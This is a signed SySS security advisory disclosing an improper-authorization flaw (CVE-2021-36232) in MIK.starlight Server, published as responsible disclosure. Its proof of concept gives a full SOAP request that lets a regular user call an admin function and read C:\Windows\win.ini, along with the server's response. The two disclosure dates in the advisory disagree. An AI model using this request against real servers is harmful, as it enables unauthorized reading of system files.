-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2021-036
Product: MIK.starlight Server
Manufacturer: MIK GmbH
Affected Version(s): -
Tested Version(s): 7.9.5.24363
Vulnerability Type: CWE-285: Improper Authorization
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2021-07-02
Solution Date: -
Public Disclosure: 2021-07-28
CVE Reference: CVE-2021-36232
Authors of Advisory: Johannes Eger, Nicola Staller
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
The MIK.starlight server is a web server that provides the basis for the
MIK.starlight suite.
The manufacturer describes the product as follows (see [1]):
"MIK.starlight suite offers exceptional customisable user interfaces
for data analytics and reporting. With our self-service business
intelligence solutions, users can easily create their own reports or
adapt existing ones, freeing up time and ensuring optimum flexibility."
Due to missing authorization checks, regular users can perform actions
reserved for administrative users.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The server does not seem to check whether a user is authorized to perform a
certain action. Therefore, any authenticated user can use any function
the endpoint offers.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following request is sent in an attempt to read the contents of
the file C:\Windows\win.ini. Note that the request is issued with a
regular user account:
POST /MikStarLightWCF/MikStarLightWCFService HTTP/1.1
Accept: */*
Accept-Language: de-DE
Content-Length: 731
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IMikStarLightWCFService/AdminGetFirstFileContentByFilePath"
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko
Host: IP:PORT
Pragma: no-cache
Connection: close
Proxy-Connection: Keep-Alive
false
###############
#############
USERNAME
C:\Windows\win.ini
1111111
true
The server issues a regular response, containing the contents of
the file C:\Windows\win.ini:
HTTP/1.1 200 OK
Content-Length: 1593
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 26 May 2021 08:33:04 GMT
Cache-Control: proxy-revalidate
Connection: close
0falsefalsefalsefalseOyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0DQpbZm9udHNdDQpbZXh0ZW5zaW9uc10NClttY2kgZXh0ZW5zaW9uc10NCltmaWxlc10NCltNYWlsXQ0KTUFQST0xDQo=0Initial0PolenterMiniLZOOKfalse
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
SySS is not aware of a solution for the described security issue.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2021-07-02: Vulnerability reported to manufacturer
2021-08-27: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product website for MIK.starlight
https://www.mik.de/starlight-bi-suite-2/
[2] SySS Security Advisory SYSS-2021-036
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-036.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Johannes Eger and Nicola Staller of SySS
GmbH.
E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x41DD2290
Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEoSc5SvOYsJcjMmN8nfM5+UHdIpAFAmEnTxAACgkQnfM5+UHd
IpDq1g//T/NkEZVI5HAZNx+GHEAe6Hk+Bg94Li0vgx+g8eBOJOQotXY0+WyP2qbj
AR8L9AQsOVOyLTmdepPv1xU418qJW2XaQNjOJ3vPHCTsmHyfNdtasZpjQSUZ9IlV
oxMCG+VmV9zY77vGJirVLPjZt4RebvoKyi56hntKZ/HK/rv9NxJw/2eztKsLseUU
ktyMOW7tk/qhhThCWFVHZKY+Na8p2tLlcUEXmCPj/pHpLYkeV1vVGDdMsH5heY9+
m8jXjqORR9/dhvLIe7vAj9+pIwXdPZGmX/Am5Kc4AbzHK8AWQAKN9/VlMC+oKgQ+
E2WT7HhRIiC3sXxkJH9IwlDfmWKIJZuP7zietrM2YUV0g3+y2zUcVDx6IDxmX2uf
NOqgjxa69YjpAE8CqhuU/eNRDNld05ME++xPu09zCqxP1yD1rP2J5NRk6GZG0DEZ
LMhrYd4SMmBZF62fgwTYYfQnH3GukLM6Jf+niXwIXUOI9SI6Abx73ox9CAKcdtfd
r4XIzxGVrWtulIVNVCSpaCELIF8kRgUVXU6M58AYImu3oXAdgcWQFKPrbN8s/hYN
xSZqh7etJMKIdrx4SfCuPybc+vYLMZVRDzOgI93aiqgU8yctmd6R1kqkXvfUh93m
NvV35S9FoBTbckXuZ592teqLgr6wx2B3m7btPA8O52Bp7VKxeOE=
=jqcX
-----END PGP SIGNATURE-----